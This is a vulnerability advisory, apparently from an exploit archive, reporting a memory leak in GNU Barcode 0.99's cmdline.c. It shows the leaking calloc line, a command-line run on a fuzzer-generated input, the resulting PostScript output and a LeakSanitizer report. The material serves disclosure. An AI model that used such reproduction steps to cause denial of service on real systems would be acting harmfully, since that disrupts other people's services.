GNU Barcode 0.99 Exploit, Memory Leak

# GNU Barcode 0.99 - Memory Leak
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Affected version: 0.99
# Tested on: Ubuntu 16.04.4
# Author: Gjoko 'LiquidWorm' Krstic

# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.

# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
# by malicious people to cause a DoS (Denial of Service). The vulnerability is
# caused due to an error in the 'cmdline.c', which can be exploited to cause a
# memory leak via a specially crafted file. The vulnerability is confirmed in
# version 0.99. Other versions may also be affected.

cmdline.c:

128: int commandline(struct commandline *args, int argc, char **argv,
129:                 char *errorhead)
130: {
131:     struct commandline *ptr;
132:     char *getopt_desc = (char *)calloc(512, 1);
133:     int desc_offset = 0;
134:     int opt, retval;
135:     char *value;

lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog

%%Page: 1 1

% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled  1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
%  height  xpos   ypos  width       height  xpos   ypos  width
   [75.00  11.00  15.00  1.85]      [75.00  13.50  15.00  0.85]
   [75.00  16.50  15.00  0.85]      [70.00  21.50  20.00  0.85]
   [70.00  27.00  20.00  3.85]      [70.00  30.50  20.00  0.85]
   [70.00  32.50  20.00  0.85]      [70.00  35.50  20.00  2.85]
   [70.00  40.00  20.00  1.85]      [70.00  43.50  20.00  0.85]
   [70.00  48.50  20.00  0.85]      [70.00  51.00  20.00  1.85]
   [70.00  54.50  20.00  0.85]      [70.00  57.50  20.00  0.85]
   [70.00  62.00  20.00  3.85]      [70.00  65.50  20.00  0.85]
   [70.00  68.50  20.00  0.85]      [70.00  71.00  20.00  1.85]
   [70.00  76.50  20.00  0.85]      [70.00  80.00  20.00  3.85]
   [70.00  84.50  20.00  0.85]      [70.00  87.50  20.00  0.85]
   [70.00  91.00  20.00  1.85]      [70.00  96.50  20.00  0.85]
   [70.00  98.50  20.00  0.85]      [70.00 101.00  20.00  1.85]
   [70.00 104.50  20.00  0.85]      [70.00 109.50  20.00  0.85]
   [70.00 113.00  20.00  3.85]      [70.00 117.50  20.00  0.85]
   [70.00 120.50  20.00  0.85]      [70.00 123.50  20.00  2.85]
   [70.00 128.00  20.00  1.85]      [70.00 131.50  20.00  0.85]
   [70.00 137.00  20.00  1.85]      [70.00 139.50  20.00  0.85]
   [70.00 142.50  20.00  0.85]      [70.00 147.50  20.00  0.85]
   [70.00 151.00  20.00  1.85]      [70.00 154.50  20.00  2.85]
   [70.00 158.50  20.00  0.85]      [70.00 162.00  20.00  1.85]
   [70.00 164.50  20.00  0.85]      [70.00 168.50  20.00  2.85]
   [70.00 172.00  20.00  1.85]      [70.00 175.50  20.00  0.85]
   [70.00 179.50  20.00  2.85]      [70.00 183.00  20.00  1.85]
   [70.00 186.50  20.00  0.85]      [70.00 190.50  20.00  2.85]
   [70.00 194.00  20.00  1.85]      [70.00 197.50  20.00  0.85]
   [70.00 201.50  20.00  2.85]      [70.00 205.00  20.00  1.85]
   [70.00 209.00  20.00  1.85]      [70.00 212.50  20.00  0.85]
   [70.00 215.50  20.00  2.85]      [70.00 220.00  20.00  1.85]
   [70.00 223.50  20.00  0.85]      [70.00 227.50  20.00  2.85]
   [70.00 230.50  20.00  0.85]      [70.00 233.00  20.00  1.85]
   [70.00 237.50  20.00  2.85]      [70.00 241.50  20.00  0.85]
   [70.00 245.00  20.00  3.85]      [70.00 249.50  20.00  0.85]
   [70.00 252.50  20.00  0.85]      [70.00 258.00  20.00  1.85]
   [70.00 260.50  20.00  0.85]      [70.00 263.50  20.00  0.85]
   [70.00 267.00  20.00  1.85]      [70.00 269.50  20.00  0.85]
   [70.00 275.50  20.00  2.85]      [70.00 279.50  20.00  0.85]
   [70.00 283.00  20.00  1.85]      [70.00 285.50  20.00  0.85]
   [70.00 289.50  20.00  2.85]      [70.00 293.00  20.00  1.85]
   [70.00 297.00  20.00  1.85]      [70.00 301.50  20.00  2.85]
   [70.00 304.50  20.00  0.85]      [70.00 307.50  20.00  0.85]
   [70.00 310.00  20.00  1.85]      [70.00 314.50  20.00  2.85]
   [70.00 318.50  20.00  0.85]      [70.00 322.00  20.00  3.85]
   [70.00 326.50  20.00  0.85]      [70.00 329.50  20.00  0.85]
   [70.00 332.50  20.00  0.85]      [70.00 337.00  20.00  3.85]
   [70.00 340.50  20.00  0.85]      [70.00 345.50  20.00  0.85]
   [70.00 348.00  20.00  1.85]      [70.00 352.50  20.00  2.85]
   [70.00 356.50  20.00  0.85]      [70.00 360.00  20.00  1.85]
   [70.00 362.50  20.00  0.85]      [70.00 366.50  20.00  2.85]
   [70.00 370.00  20.00  1.85]      [70.00 373.50  20.00  0.85]
   [70.00 377.50  20.00  2.85]      [70.00 381.00  20.00  1.85]
   [70.00 384.50  20.00  0.85]      [70.00 388.50  20.00  2.85]
   [70.00 392.00  20.00  1.85]      [70.00 395.50  20.00  0.85]
   [70.00 399.50  20.00  2.85]      [70.00 403.00  20.00  1.85]
   [70.00 406.50  20.00  0.85]      [70.00 410.50  20.00  2.85]
   [70.00 414.00  20.00  1.85]      [70.00 417.50  20.00  0.85]
   [70.00 421.50  20.00  2.85]      [70.00 425.00  20.00  1.85]
   [70.00 428.50  20.00  0.85]      [70.00 431.00  20.00  1.85]
   [70.00 435.50  20.00  2.85]      [70.00 439.50  20.00  0.85]
   [70.00 445.00  20.00  3.85]      [70.00 448.50  20.00  0.85]
   [70.00 450.50  20.00  0.85]      [70.00 452.50  20.00  0.85]
   [70.00 457.00  20.00  3.85]      [70.00 462.50  20.00  2.85]
   [70.00 466.50  20.00  0.85]      [70.00 470.00  20.00  1.85]
   [70.00 472.50  20.00  0.85]      [70.00 476.00  20.00  1.85]
   [70.00 481.50  20.00  0.85]      [70.00 483.50  20.00  0.85]
   [70.00 486.50  20.00  0.85]      [70.00 489.00  20.00  1.85]
   [70.00 496.00  20.00  3.85]      [70.00 499.50  20.00  0.85]
   [70.00 502.50  20.00  0.85]      [70.00 505.50  20.00  0.85]
   [70.00 511.00  20.00  3.85]      [70.00 514.50  20.00  0.85]
   [70.00 516.50  20.00  0.85]      [70.00 521.50  20.00  0.85]
   [70.00 524.00  20.00  1.85]      [70.00 527.50  20.00  0.85]
   [70.00 530.00  20.00  1.85]      [70.00 534.50  20.00  2.85]
   [70.00 538.50  20.00  0.85]      [70.00 541.50  20.00  0.85]
   [70.00 546.00  20.00  3.85]      [70.00 549.50  20.00  0.85]
   [70.00 552.00  20.00  1.85]      [70.00 555.50  20.00  0.85]
   [70.00 560.50  20.00  0.85]      [70.00 562.50  20.00  0.85]
   [70.00 567.00  20.00  3.85]      [70.00 572.50  20.00  2.85]
   [70.00 576.50  20.00  0.85]      [70.00 580.00  20.00  1.85]
   [70.00 582.50  20.00  0.85]      [70.00 586.50  20.00  2.85]
   [70.00 591.00  20.00  1.85]      [70.00 594.00  20.00  1.85]
   [70.00 598.50  20.00  2.85]      [70.00 602.50  20.00  0.85]
   [70.00 605.50  20.00  2.85]      [70.00 608.50  20.00  0.85]
   [70.00 612.00  20.00  1.85]      [70.00 615.50  20.00  0.85]
   [70.00 620.00  20.00  1.85]      [70.00 622.50  20.00  0.85]
   [75.00 627.00  15.00  1.85]      [75.00 632.50  15.00  2.85]
   [75.00 635.50  15.00  0.85]      [75.00 638.00  15.00  1.85]

] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
%   char    xpos   ypos fontsize
    [(o)   21.00  10.00 12.00]
    [(/)   32.00  10.00  0.00]
    [(c)   43.00  10.00  0.00]
    [(r)   54.00  10.00  0.00]
    [(a)   65.00  10.00  0.00]
    [(s)   76.00  10.00  0.00]
    [(h)   87.00  10.00  0.00]
    [(e)   98.00  10.00  0.00]
    [(s)  109.00  10.00  0.00]
    [(/)  120.00  10.00  0.00]
    [(i)  131.00  10.00  0.00]
    [(d)  142.00  10.00  0.00]
    [(:)  153.00  10.00  0.00]
    [(0)  164.00  10.00  0.00]
    [(0)  175.00  10.00  0.00]
    [(0)  186.00  10.00  0.00]
    [(0)  197.00  10.00  0.00]
    [(3)  208.00  10.00  0.00]
    [(4)  219.00  10.00  0.00]
    [(,)  230.00  10.00  0.00]
    [(s)  241.00  10.00  0.00]
    [(i)  252.00  10.00  0.00]
    [(g)  263.00  10.00  0.00]
    [(:)  274.00  10.00  0.00]
    [(0)  285.00  10.00  0.00]
    [(6)  296.00  10.00  0.00]
    [(,)  307.00  10.00  0.00]
    [(s)  318.00  10.00  0.00]
    [(r)  329.00  10.00  0.00]
    [(c)  340.00  10.00  0.00]
    [(:)  351.00  10.00  0.00]
    [(0)  362.00  10.00  0.00]
    [(0)  373.00  10.00  0.00]
    [(0)  384.00  10.00  0.00]
    [(0)  395.00  10.00  0.00]
    [(0)  406.00  10.00  0.00]
    [(0)  417.00  10.00  0.00]
    [(,)  428.00  10.00  0.00]
    [(o)  439.00  10.00  0.00]
    [(p)  450.00  10.00  0.00]
    [(:)  461.00  10.00  0.00]
    [(h)  472.00  10.00  0.00]
    [(a)  483.00  10.00  0.00]
    [(v)  494.00  10.00  0.00]
    [(o)  505.00  10.00  0.00]
    [(c)  516.00  10.00  0.00]
    [(,)  527.00  10.00  0.00]
    [(r)  538.00  10.00  0.00]
    [(e)  549.00  10.00  0.00]
    [(p)  560.00  10.00  0.00]
    [(:)  571.00  10.00  0.00]
    [(1)  582.00  10.00  0.00]
    [(2)  593.00  10.00  0.00]
    [(8)  604.00  10.00  0.00]
]   { {} forall dup 0.00 ne {
  /Helvetica findfont exch scalefont setfont
    } {pop} ifelse
    moveto show} bind forall
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"

showpage
%%Trailer

==2183==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 512 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
    #1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132

Direct leak of 55 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)

SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD